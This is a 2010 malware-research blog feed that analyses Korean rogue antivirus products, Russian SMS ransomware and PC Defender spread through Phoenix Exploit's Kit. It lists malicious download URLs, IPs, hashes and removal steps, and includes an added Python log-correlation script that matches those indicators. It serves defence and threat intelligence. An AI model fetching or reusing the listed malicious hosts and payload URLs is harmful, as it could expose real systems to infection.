<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAlRo25DcI/AAAAAAAAAUk/17-bb26KXlE/s1600/MI_PCBoan-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAlRo25DcI/AAAAAAAAAUk/17-bb26KXlE/s400/MI_PCBoan-scan.png" width="400" /></a></div><br />
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">This rogue reports to a Pay-per-Install affiliate system whose domain resolves to an IP address belonging to the ISP "<b>KRNIC</b>".</div><div style="text-align: justify;"><br />
</div><b>211.33.123.40</b>/pcboanplus/install.php?mac=000C29CA888C&partner=PcBoanPlus&ver= <br />
<br />
file.pcboanPlus.com/app/updater/PcBoanPlus2Up.exe<br />
file.pcboanplus.com/app/Client/PcBoanplus2.exe<br />
pcboanplus.com/app/badinfo.php?Vn=2005010100&Kind=comp<br />
<br />
s223.pc-korea.net/badlist/2010080700_badfile.dat<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAmvT3KD6I/AAAAAAAAAUs/v0DCEAF6SNs/s1600/MI_PC-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAmvT3KD6I/AAAAAAAAAUs/v0DCEAF6SNs/s400/MI_PC-korea.png" width="400" /></a></div><br />
<br />
<span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Uninstall from Program Files.<br />
Run an updated antivirus.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<a href="http://malwareint.blogspot.com/2010/08/pirated-edition-affiliate-program-pay.html" style="color: orange;">Pirated Edition. Affiliate program Pay-per-Install</a><br />
<a href="http://malwareint.blogspot.com/2010/08/pay-per-install-through-viva-installs.html" style="color: orange;">Pay-per-Install through VIVA INSTALLS / HAPPY INSTALLS in BKCNET “SIA” IZZI </a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-55186306392728051782010-08-21T20:39:00.000+01:002010-08-21T20:39:22.832+01:00Litter Korean rogue lurking I<div style="text-align: justify;">Language is no barrier for developers of malicious code, and the criminals' targets extend far beyond any border. Although the largest flow of variants is in English and, to a lesser extent, Russian, every now and then the guns are aimed at specific audiences, as in this case: a Korean rogue.</div><br />
<div style="color: black;"><b>MegaVaccine</b></div>megavaccine.com - <b>218.146.255.151</b> - KORNET KOREA TELECOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s1600/MI_MV-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s400/MI_MV-korea.png" width="400" /></a></div>The same IP also hosts the following domains:<br />
goodprivacy.co.kr<br />
megavaccine.com<br />
pc-privacy.co.kr<br />
pc-up.co.kr<br />
pcsweeper.co.kr<br />
pctool.co.kr<br />
privacyboan.com<br />
privacyq.com<br />
rprotect.co.kr<br />
uprivacy.net<br />
wowprotect.co.kr<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THAiSxfRf9I/AAAAAAAAAUE/3CC87DVG1vU/s1600/MI_pkwow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THAiSxfRf9I/AAAAAAAAAUE/3CC87DVG1vU/s400/MI_pkwow.png" width="400" /></a></div><br />
megavaccine_setup.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=5b4f53218fb3da9fe188193ed46d0fd52b5050adb0d5b2a1933fd92a9adf6fa7-1282310433" style="color: orange;">2234041b04e072aa7585209fa66e8550</a>)<br />
<br />
down.megavaccine.com/autoupdate/MegaVaccine/MVaccine.exe<br />
down.megavaccine.com/Update_db/addb.dat<br />
down.megavaccine.com/Update_db/adsub.dat<br />
down.megavaccine.com/Update_db/adtc.dat<br />
down.megavaccine.com/Update_db/avmon.dat<br />
down.megavaccine.com/Update_db/inter.dll<br />
down.megavaccine.com/Update_db/pwdb.dat<br />
down.megavaccine.com/Update_db/vsdb.dat<br />
down.megavaccine.com/Update_info/2010081900-00-.txt<br />
down.megavaccine.com/Update_ini/MegaVaccine/autoupdate.ini<br />
down.megavaccine.com/app/weboard.html<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THAiYyETHNI/AAAAAAAAAUU/ocpy3RWPa5s/s1600/MI_MV-korea-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THAiYyETHNI/AAAAAAAAAUU/ocpy3RWPa5s/s400/MI_MV-korea-scan.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s1600/MI_MV-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Uninstall from Program Files.<br />
Run an updated antivirus.<br />
<br />
<br />
<b>Related information</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-18732817396099667042010-08-16T02:07:00.000+01:002010-08-16T02:07:20.566+01:00New Russian SMS ransomware In-the-Wild<div style="text-align: justify;">The development of malware designed to block access to the operating system is in full expansion. Although today's <b>ransomware</b> is a very different generation from the first ones, which, using cryptovirology, literally kidnapped user files by encrypting them and demanded financial compensation in exchange for the release key, the concept and the goal have not changed.<br />
<br />
In this case it's a new variant of <b>SMS ransomware</b> that blocks access to the operating system and displays an alleged security report referring to an infection by a variant of the trojan that recruits zombies for <b>ZeuS</b> botnets; the report is, of course, false.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOCuLtaII/AAAAAAAAATc/4U6uSoYWqwY/s1600/MI_ransom-blocker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOCuLtaII/AAAAAAAAATc/4U6uSoYWqwY/s400/MI_ransom-blocker.png" width="400" /></a></div><br />
<div style="text-align: justify;">The brief report is in Russian, from which it follows that the malware targets users of that country. However, the spread of the threat knows no boundaries or language limitations.<br />
<br />
According to the text, to obtain an unlock key it is necessary to send an SMS to <b>4161</b> with the message <b>2AV112239</b>. This alphanumeric string isn't the only one that can be shown: the malware carries a list from which one is displayed at random. The list consists of the following strings:</div><br />
The malware disables booting into Safe Mode and blocks access to the following programs:<br />
<ul><li>TASKMGR.EXE</li>
<li>REGEDT32.EXE</li>
<li>MSCONFIG.EXE</li>
<li>EXPLORER.EXE</li>
<li>TEXPL.EXE</li>
<li>ANVIR.EXE </li>
</ul><span style="font-size: large;"><b>Countermeasure</b></span><br />
Unlock the screen by entering the following key:<br />
<ul><li><b>Environ</b></li>
</ul>Click the first button and press <b>Enter</b>.<br />
Restart the system.<br />
Delete the registry entry that references ctfmon.exe (see the screenshot below). Note that ctfmon.exe is also the name of a legitimate Windows component (the Text Services loader in %SystemRoot%\system32), so remove only the entry the malware added, not the legitimate one.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOJ4sXKHI/AAAAAAAAATk/4vB1U23aJwk/s1600/MI_regedit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOJ4sXKHI/AAAAAAAAATk/4vB1U23aJwk/s400/MI_regedit.png" width="400" /></a></div><br />
Run a scan with an up-to-date antivirus.<br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-58431587693351649312010-08-11T20:18:00.000+01:002010-08-11T20:18:14.065+01:00PC Defender Antivirus rogue updates its registration system<div style="text-align: justify;">The criminals behind the <b>PC Defender Antivirus</b> rogue have, in the last few hours, updated the registration system of the fake application.<br />
<br />
In the first version, registering meant sending a premium-rate SMS to a telephone number located in Russia; this new version instead asks for a serial number (supposedly tied to the hardware) which is used as part of an activation key.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGL04JSl3FI/AAAAAAAAASk/in6ZuUmiP_w/s1600/MI_pcdav-act.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGL04JSl3FI/AAAAAAAAASk/in6ZuUmiP_w/s400/MI_pcdav-act.png" width="400" /></a></div>It also adds a <i>Buy</i> button that redirects to an order form hosted on <i>Plimus</i>, and the interface has been translated into English; the first version was Russian-only.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGL1EHyyJ5I/AAAAAAAAASs/I0rJMymWGOw/s1600/MI_en.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGL1EHyyJ5I/AAAAAAAAASs/I0rJMymWGOw/s400/MI_en.png" width="400" /></a></div><div style="text-align: justify;">This makes it quite evident that behind the spread of these threats lies an organisation dedicated to developing malware for an underground economy that feeds on increasingly fraudulent methods.</div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-21690495171546624982010-08-11T19:07:00.000+01:002010-08-11T19:32:50.625+01:00Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus<div style="text-align: justify;"><b>Pay-per-Install</b> is a business model in which an <b>affiliate system</b> supplies its "clients" with one or more pieces of malicious code and pays each of them a commission for every successful installation of the malicious application.<br />
<br />
<b>Phoenix Exploit's Kit</b> is a crimeware package that also does intelligence work, collecting statistics about each infected computer. Its control panel is reached over HTTP through a login page, as the screenshot shows.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLirliq6VI/AAAAAAAAARs/JxpwPrkBnPA/s1600/MI_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLirliq6VI/AAAAAAAAARs/JxpwPrkBnPA/s400/MI_login.png" width="400" /></a></div><div style="text-align: justify;"><b>PC Defender Antivirus</b> is a rogue of Russian origin that is being spread through Phoenix Exploit's Kit and that, at the same time, reports to an affiliate system which records the installation of every downloaded copy.<br />
<br />
Besides feeding the criminal circuit through Pay-per-Install, the rogue also runs the usual business of this kind of software: the victim is pushed to buy the fraudulent application, again over the web, through an order form whose confidential credit-card data ends up stored somewhere under the criminals' control. The rogue costs <b>USD 59.95</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLi5CccdlI/AAAAAAAAAR0/906aUzYdpzI/s1600/MI_pcdav.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLi5CccdlI/AAAAAAAAAR0/906aUzYdpzI/s400/MI_pcdav.png" width="400" /></a></div><div style="text-align: justify;">Phoenix Exploit's Kit delivers a trojan downloader named <b>exe.exe</b> (in this case MD5 e49be7ef82250a36cf7410004ac3d69c) which connects to fordkaksosat.info (<b>193.105.207.45</b> - <b>AS50793</b> "<b>ALFAHOSTNET</b>"), downloads the rogue (<b>PCDefenderSilentSetup.msi</b>, MD5 ecff63c1f983858dfd7fb926738cb478) and executes it.<br />
<br />
At that point the rogue reports the successful installation to the affiliate system through the file <b>count_installs.php</b>, and starts a fake malware scan that raises alerts about supposed infections and, equally fake, attempted connections. This behaviour is routine in this kind of malware, since it is one of its main sales hooks.</div><br />
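The chain just described (downloader contact, rogue fetched, installation reported through count_installs.php) can be correlated per client in a web-proxy log. The script below is an added example, not code from the original post nor from any tool it mentions: it uses only the host, IP and file names given above. The log layout ("epoch client method url status"), the sample lines and the affiliate host <i>affiliate.example</i> are constructed assumptions; the post does not name the host that receives count_installs.php.

```python
"""Correlate web-proxy log lines against the Phoenix -> exe.exe -> PC Defender ->
pay-per-install chain.  Added example, not from the original post."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators from the post: download host and its IP, the rogue installer, the PPI callback.
DOWNLOAD_HOSTS = {"fordkaksosat.info", "193.105.207.45"}
ROGUE_INSTALLER = "/pcdefendersilentsetup.msi"
PPI_CALLBACK = "/count_installs.php"

# Each stage is (name, predicate over lowercased host and path).  Names sort in chain order.
STAGES = (
    ("1-downloader-contact", lambda host, path: host in DOWNLOAD_HOSTS),
    ("2-rogue-fetched", lambda host, path: path.endswith(ROGUE_INSTALLER)),
    ("3-install-reported", lambda host, path: path.endswith(PPI_CALLBACK)),
)

# Assumed log layout (constructed for this example): "<epoch> <client-ip> <METHOD> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def classify(url):
    """Return the set of stage names a URL matches (empty for benign traffic)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    return {name for name, matches in STAGES if matches(host, path)}


def correlate(lines):
    """Map each client to the sorted list of stages it was seen in; malformed lines are skipped."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        for stage in classify(m["url"]):
            seen[m["client"]].add(stage)
    return {client: sorted(stages) for client, stages in seen.items()}


def confirmed_installs(lines):
    """Clients that reached the PPI callback, i.e. hosts where the rogue actually ran."""
    return sorted(c for c, stages in correlate(lines).items() if "3-install-reported" in stages)


# Constructed sample log; affiliate.example stands in for the unnamed affiliate host.
SAMPLE_LOG = """\
1281550001 10.0.0.15 GET http://fordkaksosat.info/exe.exe 200
1281550009 10.0.0.15 GET http://193.105.207.45/PCDefenderSilentSetup.msi 200
1281550030 10.0.0.15 GET http://affiliate.example/count_installs.php 200
1281550040 10.0.0.22 GET http://www.example.com/index.html 200
1281550055 10.0.0.31 GET http://fordkaksosat.info/exe.exe 404
this line is not a log record
"""

if __name__ == "__main__":
    for client, stages in correlate(SAMPLE_LOG.splitlines()).items():
        print(client, "->", ", ".join(stages))
    print("confirmed installs:", confirmed_installs(SAMPLE_LOG.splitlines()))
```

A client that only shows stage 1 (here 10.0.0.31, whose download failed) is worth a look but is not a confirmed infection; a client that reaches stage 3 has executed the rogue and been counted by the affiliate, which is the case to escalate first.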
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjDc4xLGI/AAAAAAAAAR8/bq6nI5a-bh8/s1600/MI-pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjDc4xLGI/AAAAAAAAAR8/bq6nI5a-bh8/s400/MI-pcap.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjLYVkSoI/AAAAAAAAASE/wg9mK1-xatc/s1600/MI_PCDAV-infection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjLYVkSoI/AAAAAAAAASE/wg9mK1-xatc/s400/MI_PCDAV-infection.png" width="400" /></a></div><br />
<div style="text-align: justify;">The activation scheme of the supposed security application is similar to the one used by some ransomware families: the business model relies on sending a premium-rate SMS to a specific kind of number.<br />
<br />
In this case the message <b>6681</b> must be sent to the number <b>5711000002209</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjYaA16mI/AAAAAAAAASM/ZzJ1IzxV2Go/s1600/MI_PCDAV-SMS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjYaA16mI/AAAAAAAAASM/ZzJ1IzxV2Go/s400/MI_PCDAV-SMS.png" width="400" /></a></div><br />
<div style="text-align: justify;">The threat has a timer that triggers a fake <b>Blue Screen of Death</b> (<b>BSoD</b>) urging the user to register the program. This is psychological pressure: after reading the message, the user may decide to register or buy what they believe to be a real antivirus solution.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjmqNGjZI/AAAAAAAAASU/VUg8yQxHJdY/s1600/MI_BSoD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TGLjmqNGjZI/AAAAAAAAASU/VUg8yQxHJdY/s400/MI_BSoD.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s1600/MI_pcdav-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Terminate the processes <b>prockill32.exe</b>, <b>proccheck.exe</b> and <b>rundelay.exe</b>. <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">Process Explorer</a> can be used to view and terminate them.<br />
<br />
Remove the PC Defender folder (it holds six files) located in <span style="font-family: "Courier New",Courier,monospace;">C:\Program Files\Def Group\</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s1600/MI_pcdav-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TGLju6mT3GI/AAAAAAAAASc/-RIwOO3fLfs/s320/MI_pcdav-files.png" /></a></div>Delete the PC Defender value from the registry key <span style="font-family: "Courier New",Courier,monospace;">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span>; it points to <span style="font-family: "Courier New",Courier,monospace;">c:\program files\def group\PC Defender\pcdef.exe</span>. <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> can be used to view and delete the entry.<br />
<br />
<b>Related Information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html">Copyright violation: copyrighted content detected</a></div><div style="color: orange;"><a href="http://malwareint.blogspot.com/2010/08/campaign-infection-through-phoenix.html" style="color: orange;">Campaign infection through Phoenix Exploit's Pack</a> </div><a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/lockscreen-your-computer-is-infected-by.html" style="color: orange;">LockScreen. Your computer is infected by Spyware!!!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1670645896303580754.post-33226043382354505142010-07-23T03:58:00.000+01:002010-07-23T04:09:14.827+01:00SMS Ransomware porn template update<div style="text-align: justify;">A new <a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">variant of ransomware type blocker that promotes pornographic sites</a> is In-the-Wild, with the inner slightly modified. Basically you have changed the number to which the victim must send messages like SMS. Now the number is <b>86571252</b> and the message remains the same: <b>6005</b>.<br />
<br />
Another change is in the location which holds the copy of the threat. In this case, the path is <span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\Default User\Media\</span> under the name <b>run32.exe</b>. The first image shows the previous version, while the second corresponds to the new variant of the <b>SMS Ransomware</b>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDAiS9iuI/AAAAAAAAAQk/mATI_j_6RCM/s1600/MI_ransom-full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDAiS9iuI/AAAAAAAAAQk/mATI_j_6RCM/s400/MI_ransom-full.png" width="400" /></a><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDNXBazcI/AAAAAAAAAQs/Sdk_vDbxQ94/s1600/MI_ransom-upd1..png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDNXBazcI/AAAAAAAAAQs/Sdk_vDbxQ94/s400/MI_ransom-upd1..png" width="400" /></a></div><div style="text-align: justify;">The ransomware is distributed, as in previous cases, through porn sites. This variant uses the same cover name (flash_player.exe); its MD5 is <b>2e8f56ce39270e10f7082a35d13a735a</b> and, as I write this update, its detection rate is average: <a href="http://www.virustotal.com/analisis/fe504e0f8f6ae024159cfb7a9b7622db3d3919c297fe62939fbb9eda8f699b79-1279837077" style="color: orange;">12/42 antivirus engines detect it</a>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDWEFfSYI/AAAAAAAAAQ0/Io5QQv-Idto/s1600/MI_ransom-update2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEkDWEFfSYI/AAAAAAAAAQ0/Io5QQv-Idto/s400/MI_ransom-update2.png" width="400" /></a></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Identify and terminate the process named <b>run32.exe</b>; the ransomware window disappears at that moment.<br />
** The process may also be named <b>process32.exe</b>.<br />
<br />
*** To kill the process you can use Task Manager or the Sysinternals tool <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">Process Explorer</a>.<br />
<br />
Delete the following system information:<br />
Registry:<br />
<span style="font-family: "Courier New",Courier,monospace;">HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Module</span><br />
Value:<br />
AModule<br />
<span style="font-family: "Courier New",Courier,monospace;">"C:\Documents and Settings\Administrador\Media\run32.exe"</span><br />
*** You can also use <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> to review the autostart entries in an organised way.<br />
<br />
Folders:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\Default User\Media</span><br />
<br />
Files:<br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\run32.exe</span><br />
<span style="font-family: "Courier New",Courier,monospace;">C:\Documents and Settings\All Users\Media\rdb.bat</span><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-90658725163942037712010-07-18T03:11:00.000+01:002010-08-22T04:56:27.271+01:00New variant of ransomware through porn sites IV<div style="text-align: justify;">Another variant of the blocker-type <b>ransomware</b> family is In-the-Wild, posing as the Flash Player installer through an executable called <a href="http://www.virustotal.com/analisis/4485e49d5d47e18cde6cb44e77c288aabb174d02855388c40f225bf21c26dea4-1279260582" style="color: orange;"><b>flash_player.exe</b></a> whose MD5 is <b>acf591ac5ad2a26bf348708dda174b33</b>.<br />
<br />
This one is also tied to a porn site, which opens immediately after the system is infected. Unlike past versions, however, the blocking window does not display an image of sexual connotation. </div><br />
